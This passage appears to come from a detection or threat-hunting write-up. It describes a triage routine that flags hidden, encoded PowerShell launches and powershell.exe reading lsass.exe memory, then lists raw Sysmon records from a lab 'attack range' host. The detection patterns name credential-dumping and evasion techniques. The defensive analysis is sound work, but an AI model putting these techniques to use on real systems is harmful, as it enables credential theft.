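Run against the samples, `triage(SAMPLE_EVENTS)` raises exactly two findings: the cmd.exe creation, because its ParentCommandLine carries `-exec bypass`, `-windowstyle hidden` and `-e`, and the constructed powershell.exe-to-lsass.exe open with VM_READ; the page's own lsass.exe-as-source records and the sysmon64.exe-to-svchost.exe 0x1400 opens stay silent. `lineage(SAMPLE_EVENTS, "g6224")` walks back to `powershell.exe (no record in window)`, which is how an analyst would notice that PID 6940's creation event has to be pulled from an earlier part of the log.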
23542300x800000000000000036498215Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:04.908{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3295757FE9CD86E8A57F4897374D18BD,SHA256=697994C95956A5D31B8268980C11CCE8DDAF56FA3B40251F4FADCE29032BF5E9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036498214Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:34.243{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50623-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036498217Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:05.924{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=99976A44A7E24AE14F3BE93E1E754163,SHA256=F1F0482C45033208F5BEDD96D8AE40820A34A5751A8086528FE87DE8C10E81F6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036498216Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:34.611{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50624-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036498218Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:06.959{B81B27B7-4024-611D-7300-00000000C801}2188NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=01B7A51772F2FD0A6D3D2B7EE5C4670F,SHA256=29BAB8F4EDFF81662DE54D8920D0F30568C76473A22AF33806CBC96ED301DFA3,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498227Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:07.973{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E37BF4DB2AAD9A0D5EBE11C64C8DF7CD,SHA256=3FE6A6A1D3060E8C90633316FC835C2C276965C2F448791C893B1E05A0EE4402,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000036498226Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:07.957{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-A1C3-6140-A356-04000000C801}4440C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498225Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:21:07.957{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498224Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:07.957{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498223Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:21:24.095{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498277Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:24.095{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498276Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:21:24.095{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498275Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:24.095{B81B27B7-4012-611D-0500-00000000C801}420984C:\Windows\system32\csrss.exe{B81B27B7-A1D4-6140-A556-04000000C801}5400C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000036498274Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:24.095{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-A1D4-6140-A556-04000000C801}5400C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000036498273Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:24.080{B81B27B7-A1D4-6140-A556-04000000C801}5400C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x800000000000000036498296Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:55.752{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50634-false10.0.1.12-8000- 354300x800000000000000036498295Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:21:54.938{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50633-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036498294Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:25.364{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=147BCAE65E03F4B8F439AE52DB51644D,SHA256=31FF16BE57A920CC0F9D8EBF6AFFA510C09C5C5E0BC3E869116BC807CBF71E41,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498293Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:25.080{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E8DA91D6C86124874F723211835DD855,SHA256=CF1BA510F84C136DA1AD0E27E8A9657E99CDFF9F2344227D44E0EE381AB15E56,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498292Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:25.080{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=AA1D351930A3BCAE98DEDF5A21EA0E98,SHA256=2F87189E9D229A95BB38E85812510766CA40D8BBB76552763B523B82D9DF748E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498297Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:21:26.379{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=47A62985C28576596933985AB9289832,SHA256=4CE2E7671FBAD35EAB0070F30B70474AA39201BF52C9339CBEE3E4E50C8CF331,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498306Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:27.394{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3C670425801FC92EEEE3510567EC9CA9,SHA256=44656E28BA5766884804429EBC353C175A7FC8A8FAD2F1033710CAB06F339C54,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000036498305Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:21:27.047{B81B27B7-4133-611D-AB00-00000000C801}45644696C:\Windows\Explorer.EXE{B81B27B7-E69F-612F-4C4A-02000000C801}2372C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\NPSMDesktopProvider.dll+1be4a|C:\Windows\System32\NPSMDesktopProvider.dll+1226e|C:\Windows\System32\NPSMDesktopProvider.dll+12835|C:\Windows\System32\NPSMDesktopProvider.dll+67dc|C:\Windows\System32\TwinUI.dll+7c948|C:\Windows\System32\TwinUI.dll+75f2d|C:\Windows\System32\TwinUI.dll+75b03|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498304Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:27.047{B81B27B7-4133-611D-AB00-00000000C801}45644688C:\Windows\Explorer.EXE{B81B27B7-E69F-612F-4C4A-02000000C801}2372C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+15d19|C:\Windows\System32\SHELL32.dll+b1b50|C:\Windows\System32\SHELL32.dll+b3057|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bd5f|C:\Windows\System32\windows.storage.dll+13aaeb|C:\Windows\System32\windows.storage.dll+13900f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498303Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:21:27.047{B81B27B7-4133-611D-AB00-00000000C801}45644688C:\Windows\Explorer.EXE{B81B27B7-E69F-612F-4C4A-02000000C801}2372C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b1604|C:\Windows\System32\SHELL32.dll+b3057|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bd5f|C:\Windows\System32\windows.storage.dll+13aaeb|C:\Windows\System32\windows.storage.dll+13900f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000036498302Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:27.047{B81B27B7-4133-611D-AB00-00000000C801}4564ATTACKRANGE\REED_SCHMIDTC:\Windows\Explorer.EXEC:\Users\reed_schmidt\AppData\Local\Microsoft\PenWorkspace\DiscoverCacheData.datMD5=58FDE1A71D2ADB272DABB3A92B406559,SHA256=555933C7D5D49EBF3648EE1EF420E0C71835139B8A8DEF8FBA64C9EBE48B0C32,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000036498301Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:27.047{B81B27B7-4133-611D-AB00-00000000C801}45644752C:\Windows\Explorer.EXE{B81B27B7-E69F-612F-4D4A-02000000C801}6228C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b13af|C:\Windows\System32\SHELL32.dll+b2af0|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498300Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:21:27.047{B81B27B7-4133-611D-AB00-00000000C801}45644752C:\Windows\Explorer.EXE{B81B27B7-E69F-612F-4D4A-02000000C801}6228C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+981b0|C:\Windows\System32\SHELL32.dll+b2aac|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498299Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:27.047{B81B27B7-4133-611D-AB00-00000000C801}45644752C:\Windows\Explorer.EXE{B81B27B7-E69F-612F-4D4A-02000000C801}6228C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b1604|C:\Windows\System32\SHELL32.dll+b2a80|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498298Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:27.047{B81B27B7-4133-611D-AB00-00000000C801}45644752C:\Windows\Explorer.EXE{B81B27B7-E69F-612F-4D4A-02000000C801}6228C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d319|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000036498308Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:28.409{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=32ED9101F3C4F0575605FE20338EB44A,SHA256=D76CBE3E51315EB65A2D89F5EF4C0DD642A24F5A378C6AB15BAF63CDC5ADD6AF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498307Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:28.362{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=DAA7AE6A59832F44AFD572C4B4777457,SHA256=6B15C6C656550B3F21F78000D671CD73DBCE8F1397FA4D2A77914FDBCD56E78D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000036498318Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:29.677{B81B27B7-4133-611D-AB00-00000000C801}45644688C:\Windows\Explorer.EXE{B81B27B7-6638-6125-B000-01000000C801}1208C:\Windows\system32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b13af|C:\Windows\System32\SHELL32.dll+b3175|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bd5f|C:\Windows\System32\windows.storage.dll+13aaeb|C:\Windows\System32\windows.storage.dll+13900f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498317Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:21:29.677{B81B27B7-4133-611D-AB00-00000000C801}45644696C:\Windows\Explorer.EXE{B81B27B7-6638-6125-B000-01000000C801}1208C:\Windows\system32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\NPSMDesktopProvider.dll+1be4a|C:\Windows\System32\NPSMDesktopProvider.dll+1226e|C:\Windows\System32\NPSMDesktopProvider.dll+12835|C:\Windows\System32\NPSMDesktopProvider.dll+67dc|C:\Windows\System32\TwinUI.dll+7c948|C:\Windows\System32\TwinUI.dll+75f2d|C:\Windows\System32\TwinUI.dll+75b03|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498316Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:29.677{B81B27B7-4133-611D-AB00-00000000C801}45644688C:\Windows\Explorer.EXE{B81B27B7-6638-6125-B000-01000000C801}1208C:\Windows\system32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b308e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bd5f|C:\Windows\System32\windows.storage.dll+13aaeb|C:\Windows\System32\windows.storage.dll+13900f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498315Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:21:29.677{B81B27B7-4133-611D-AB00-00000000C801}45644688C:\Windows\Explorer.EXE{B81B27B7-6638-6125-B000-01000000C801}1208C:\Windows\system32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b1604|C:\Windows\System32\SHELL32.dll+b3057|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bd5f|C:\Windows\System32\windows.storage.dll+13aaeb|C:\Windows\System32\windows.storage.dll+13900f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498314Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:29.677{B81B27B7-4133-611D-AB00-00000000C801}45644752C:\Windows\Explorer.EXE{B81B27B7-6639-6125-B100-01000000C801}6536C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b13af|C:\Windows\System32\SHELL32.dll+b2af0|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498313Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 